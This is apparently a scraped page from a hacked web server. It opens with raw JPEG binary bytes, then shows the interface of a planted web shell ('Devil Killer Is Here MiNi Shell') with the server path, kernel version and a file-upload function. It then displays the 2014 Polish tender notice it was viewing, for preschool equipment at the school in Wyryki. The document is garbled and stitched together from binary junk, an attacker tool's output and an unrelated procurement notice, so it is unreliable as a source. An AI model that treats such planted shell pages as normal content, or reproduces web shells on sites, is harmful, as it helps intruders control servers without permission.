JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140718/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140718/156563-N-2014.html

<p class="kh_header"><b>Wyryki: Przedmiotem zamówienia są dostawy, pn.:  Wyposażenie oddziału przedszkolnego przy Szkole Podstawowej w Wyrykach.</b><br>
<b>Numer ogłoszenia: 156563 - 2014; data zamieszczenia: 18.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół w Wyrykach , Wyryki 208, 22-205 Wyryki, woj. lubelskie, tel. 82 5913006, faks 82 5913006.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: gminna jednost. organizacyjna,dla której organem założycielskim jest Wójt Gminy Wyryki.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia są dostawy, pn.:  Wyposażenie oddziału przedszkolnego przy Szkole Podstawowej w Wyrykach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje Wyposażenie oddziału przedszkolnego przy Szkole Podstawowej w Wyrykach, i składa się z trzech części:
1.część pierwsza przedmiotu zamówienia, zwana dalej Ofertą Częściową Nr 1, obejmuje dostawy, w których główne przedmioty zamówienia, oznaczone są kodami alfanumerycznymi Wspólnego Słownika Zamówień (CPV) 30121100-4; 30121200-5; 30200000-1; 32322000-6 (fotokopiarki, urządzenia fotokopiujące, urządzenia komputerowe, urządzenia multimedialne);

Lp.  18   Zakup sprzętu ICT - Komputer wraz z oprogramowaniem
Lp.  19   Zakup sprzętu ICT - Drukarka laserowa
Lp.  20   Zakup tablic interaktywnych wraz z oprogramowaniem
Lp.  21   Zakup sprzętu ICT - Rzutnik multimedialny
Lp.  22   Zakup sprzętu audiowizualnego - Radio z odtwarzaczem CD
Lp.  23   Zakup kserokopiarki
Lp.  24   Zakup sprzętu audiowizualnego - Telewizor
Lp.  25   Zakup sprzętu audiowizualnego - Odtwarzacz DVD
Lp.  26   Zakup sprzętu ICT -  Ekran

2.część druga przedmiotu zamówienia, zwana dalej Ofertą Częściową Nr 2,  
 obejmuje dostawy, w których główne przedmioty zamówienia, oznaczone są kodami  alfanumerycznymi Wspólnego Słownika Zamówień (CPV) 39162100-6; 37520000-9 (zabawki, pomoce dydaktyczne);

Lp.  28   Zabawki i pomoce dydaktyczne - komplet zabawek - Klocki drewniane 
Lp.  29   Zabawki i pomoce dydaktyczne - komplet zabawek - Geometryczne kształty z tworzywa
Lp.  30   Zabawki i pomoce dydaktyczne - komplet zabawek - Samochód wywrotka
Lp.  31   Zabawki i pomoce dydaktyczne - komplet zabawek - Plansza/mata do zabawy samochodami ze schematami ulic, skrzyżowań
Lp.  32   Zabawki i pomoce dydaktyczne - komplet zabawek - Zestaw narzędzi do majsterkowania
Lp.  33   Zabawki i pomoce dydaktyczne - komplet zabawek - Zestaw perkusyjny
Lp.  34   Zabawki i pomoce dydaktyczne - komplet zabawek - Koń na biegunach
Lp.  35   Zabawki i pomoce dydaktyczne - komplet zabawek - Zestaw plansz do zabaw ruchowych
Lp.  36   Zabawki i pomoce dydaktyczne - komplet zabawek - Skakanka
Lp.  37   Zabawki i pomoce dydaktyczne - komplet zabawek - Piłka 30 cm
Lp.  38   Zabawki i pomoce dydaktyczne - komplet zabawek - Lalka
Lp.  39   Zabawki i pomoce dydaktyczne - komplet zabawek - Łóżko drewniane
Lp.  40   Zabawki i pomoce dydaktyczne - komplet zabawek - Zestaw małego lekarza
Lp.  41   Zabawki i pomoce dydaktyczne - komplet zabawek - Kuchenka
Lp.  42   Zabawki i pomoce dydaktyczne - komplet zabawek - Łazik (jeździk dla dzieci)
Lp.  43   Zabawki i pomoce dydaktyczne - komplet zabawek - Pojemnik na zabawki
Lp.  44   Zabawki i pomoce dydaktyczne - komplet zabawek - Kasa z kalkulatorem
Lp.  45   Zabawki i pomoce dydaktyczne - komplet zabawek - Piłka skacząca różne rozmiary
Lp.  46   Zabawki i pomoce dydaktyczne - komplet zabawek - Ringo
Lp.  47   Zabawki i pomoce dydaktyczne - komplet zabawek - Frisbee (latający dysk)
Lp.  48   Zabawki i pomoce dydaktyczne - komplet zabawek -Tunel dla dzieci dł. ok. 180 cm
Lp.  49   Zabawki i pomoce dydaktyczne - komplet zabawek - Miś
Lp.  50   Zabawki i pomoce dydaktyczne - komplet zabawek - Taca z naczyniami
Lp.  51   Zabawki i pomoce dydaktyczne - komplet zabawek - Samochód strażacki
Lp.  52   Zabawki i pomoce dydaktyczne - komplet zabawek - Betoniarka
Lp.  53   Zabawki i pomoce dydaktyczne - komplet zabawek - Koparka
Lp.  54   Zabawki i pomoce dydaktyczne - komplet zabawek - Puzzle drewniane (różne wzory)
Lp.  55   Zabawki i pomoce dydaktyczne - komplet zabawek - Dom do zabawy (wersja duża)
Lp.  56   Pomoce dydaktyczne Komplet pomocy dydaktycznych potrzebnych do realizacji zajęć w 1 grupie przedszkolnej - Słuchowiska z bajkami - zestaw edukacyjny
Lp.  57   Pomoce dydaktyczne Komplet pomocy dydaktycznych potrzebnych do realizacji zajęć w 1 grupie przedszkolnej - Uczymy się słówek - książka z ćwiczeniami
Lp.  58   Pomoce dydaktyczne Komplet pomocy dydaktycznych potrzebnych do realizacji zajęć w 1 grupie przedszkolnej - Gra w skojarzenia - karty do nauki języka angielskiego
Lp.  59   Pomoce dydaktyczne Komplet pomocy dydaktycznych potrzebnych do realizacji zajęć w 1 grupie przedszkolnej - Ścienna mapa Polski - dla dzieci
Lp.  60   Pomoce dydaktyczne Komplet pomocy dydaktycznych potrzebnych do realizacji zajęć w 1 grupie przedszkolnej - Gra ćwicząca pamięć dziecka - flagi
Lp.  61   Pomoce dydaktyczne Komplet pomocy dydaktycznych potrzebnych do realizacji zajęć w 1 grupie przedszkolnej - Unia Europejska - gra edukacyjna
Lp.  62   Pomoce dydaktyczne Komplet pomocy dydaktycznych potrzebnych do realizacji zajęć w 1 grupie przedszkolnej - Plansze przyrodnicze o czterech porach roku
Lp.  63   Pomoce dydaktyczne Komplet pomocy dydaktycznych potrzebnych do realizacji zajęć w 1 grupie przedszkolnej - Gra do nauki recyclingu
Lp.  64   Pomoce dydaktyczne Komplet pomocy dydaktycznych potrzebnych do realizacji zajęć w 1 grupie przedszkolnej - Ekologiczne puzzle
Lp.  65   Pomoce dydaktyczne Komplet pomocy dydaktycznych potrzebnych do realizacji zajęć w 1 grupie przedszkolnej - Liczby na magnesach
Lp.  66   Pomoce dydaktyczne Komplet pomocy dydaktycznych potrzebnych do realizacji zajęć w 1 grupie przedszkolnej - Liczydło na stojaku
Lp.  67   Pomoce dydaktyczne Komplet pomocy dydaktycznych potrzebnych do realizacji zajęć w 1 grupie przedszkolnej - Magnetyczna linijka - duża
Lp.  68   Pomoce dydaktyczne Komplet pomocy dydaktycznych potrzebnych do realizacji zajęć w 1 grupie przedszkolnej - Gry do ćwiczenia pamięci i spostrzegawczości i refleksu

3.część trzecia przedmiotu zamówienia, zwana dalej Ofertą Częściową Nr 3,  
 obejmuje dostawy, w których główne przedmioty zamówienia, oznaczone są kodami alfanumerycznymi Wspólnego Słownika Zamówień (CPV) 39161000-8; 39220000-0 (meble przedszkolne, sprzęt gospodarstwa domowego).

Lp.  27   Zakup i montaż rolet okiennych 
Lp.  69   Meble i wyposażenie - zakup i montaż Regału otwartego na zabawki
Lp.  70   Meble i wyposażenie - zakup i montaż Szafki zamykanej
Lp.  71   Meble i wyposażenie - zakup i montaż Szafki ze schowkami
Lp.  72   Meble i wyposażenie - zakup i montaż Szafki na ksero
Lp.  73   Meble i wyposażenie - zakup i montaż Biurka dla nauczyciela
Lp.  74   Meble i wyposażenie - zakup i montaż Krzesła wysokiego
Lp.  75   Meble i wyposażenie - zakupi montaż Biblioteczki
Lp.  76   Meble i wyposażenie - zakupi montaż Wykładziny dywanowej
Lp.  77   Meble i wyposażenie - zakup i montaż Tablicy
Lp.  78   Zakup i montaż mebli do  wyposażenia szatni  i innych pomieszczeń gospodarczych - Szafka na ubrania
Lp.  79   Zakup i montaż mebli do  wyposażenia szatni  i innych pomieszczeń gospodarczych - Szafa
Lp.  80   Zakup Wyposażenia do utrzymania czystości w pomieszczeniach - Pralka
Lp.  81   Zakup Wyposażenia do utrzymania czystości w pomieszczeniach - Odkurzacz.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość dzielenia zamówień uzupełniających w okolicznościach wymienionych w art. 67 ust.1 pkt.6 ustawy, stanowiących nie więcej niż 50 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.12.11.00-4, 30.12.12.00-5, 32.32.20.00-6, 39.16.21.00-6, 37.52.00.00-9, 39.16.10.00-8, 39.22.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 25.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Na etapie składania ofert (przed upływem terminu składania ofert) Zamawiający będzie wymagał wniesienia wadium w wysokości 
Część 1 : 400 złotych.
Część 2 : 400 złotych.
Część 3 : 400 złotych.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>przewiduje się udzielenie zaliczek na poczet wykonania zamówienia</b></li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O dopuszczenie do udziału w niniejszym postępowaniu mogą ubiegać się
    Wykonawcy, którzy spełniają warunki dotyczące:

posiadania uprawnień do wykonywania  działalności gospodarczej lub czynności polegających na:
a) dostawach fotokopiarek i/lub urządzeń fotokopiujących i/lub urządzeń komputerowych i/lub urządzeń multimedialnych - dla Oferty Częściowej Nr 1,
b) dostawach zabawek i/lub pomocy dydaktycznych oraz artykułów plastycznych - 
dla Oferty Częściowej Nr 2,     
c) dostawach mebli przedszkolnych i/lub sprzętu gospodarstwa domowego - 
dla Oferty Częściowej Nr 3,
- jeżeli przepisy prawa nakładają obowiązek ich posiadania;

posiadania wiedzy i doświadczenia w zakresie:
a) dostaw fotokopiarek i/lub urządzeń fotokopiujących i/lub urządzeń komputerowych i/lub urządzeń multimedialnych - dla Oferty Częściowej Nr 1, o wartości co najmniej 15 000  złotych brutto w ramach danego zamówienia,
b) dostaw zabawek i/lub pomocy dydaktycznych oraz artykułów plastycznych - 
dla Oferty Częściowej Nr 2, o  wartości co najmniej 10 000  złotych brutto w ramach danego zamówienia,
c) dostaw mebli przedszkolnych i/lub sprzętu gospodarstwa domowego - dla Oferty Częściowej Nr 3, o wartości co najmniej 15 000  złotych brutto w ramach danego zamówienia,

dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia.

sytuacji ekonomicznej i finansowej.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2)	Zamawiający uzna, że Wykonawca spełnia warunek posiadania  wiedzy i doświadczenia w zakresie dostaw fotokopiarek i lub urządzeń fotokopiujących i lub urządzeń komputerowych i lub urządzeń multimedialnych - dla Oferty Częściowej Nr 1, o wartości co najmniej 15 000  złotych brutto 
w ramach danego zamówienia, dostaw zabawek i lub pomocy dydaktycznych oraz artykułów plastycznych -  dla Oferty Częściowej Nr 2, o  wartości co najmniej 10 000  złotych brutto w ramach danego zamówienia, dostaw mebli przedszkolnych i/lub sprzętu gospodarstwa domowego - dla Oferty Częściowej Nr 3, o wartości co najmniej 15 000  złotych brutto w ramach danego zamówienia, jeżeli wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej jedno takie zamówienie. Warunek dotyczący posiadania wiedzy i doświadczenia jest warunkiem  zero jedynkowym  - wymagającym jedynie spełnienia.  Wykonawcy wspólnie ubiegający się o udzielenie zamówienia spełnią w/w warunek, jeżeli zostanie on spełniony łącznie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>3)	Zamawiający uzna, że Wykonawca spełnia warunek dotyczący dysponowania potencjałem technicznym niezbędnym do wykonania zamówienia, jeżeli  złoży oświadczenie o spełnianiu warunków art.22 ust.1 ustawy.  Warunek dotyczący dysponowania potencjałem technicznym niezbędnym do wykonania zamówienia jest warunkiem  zero jedynkowym  - wymagającym jedynie spełnienia. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia spełnią w/w warunek, jeżeli zostanie on spełniony łącznie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	Zamawiający uzna, że Wykonawca spełnia warunek posiadania uprawnień do wykonywania działalności gospodarczej lub czynności polegających na dostawach fotokopiarek i/lub urządzeń fotokopiujących i/lub urządzeń komputerowych i/lub urządzeń multimedialnych - dla Oferty Częściowej Nr 1, dostawach zabawek i/lub pomocy dydaktycznych oraz artykułów plastycznych -  dla Oferty Częściowej Nr 2, dostawach mebli przedszkolnych i/lub sprzętu gospodarstwa domowego - dla Oferty Częściowej Nr 3, jeżeli złoży oświadczenie o spełnianiu warunków art.22 ust.1 ustawy oraz dokumenty potwierdzające posiadanie takich uprawnień; w szczególności koncesje, zezwolenia lub licencje -  jeżeli przepisy prawa nakładają obowiązek ich posiadania. Warunek dotyczący posiadania uprawnień do wykonywania określonej działalności lub czynności jest warunkiem  zero jedynkowym  - wymagającym jedynie spełnienia. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia spełnią w/w warunek, jeżeli spełni go każdy wykonawca.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca  spełnia warunek znajdowania się sytuacji ekonomicznej i finansowej umożliwiającej wykonanie zamówienia, jeżeli złoży oświadczenie o spełnianiu warunków art.22 ust.1 ustawy oraz w treści oferty wykaże, że dysponuje opłaconą polisą, a w przypadku jej braku innym dokumentem potwierdzającym, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem  zamówienia do wysokości co najmniej 40 000  złotych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">opis urządzeń technicznych oraz środków organizacyjno-technicznych zastosowanych przez wykonawcę dostaw lub usług w celu zapewnienia jakości oraz opisu zaplecza naukowo-badawczego posiadanego przez wykonawcę lub które będzie pozostawało w dyspozycji wykonawcy;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
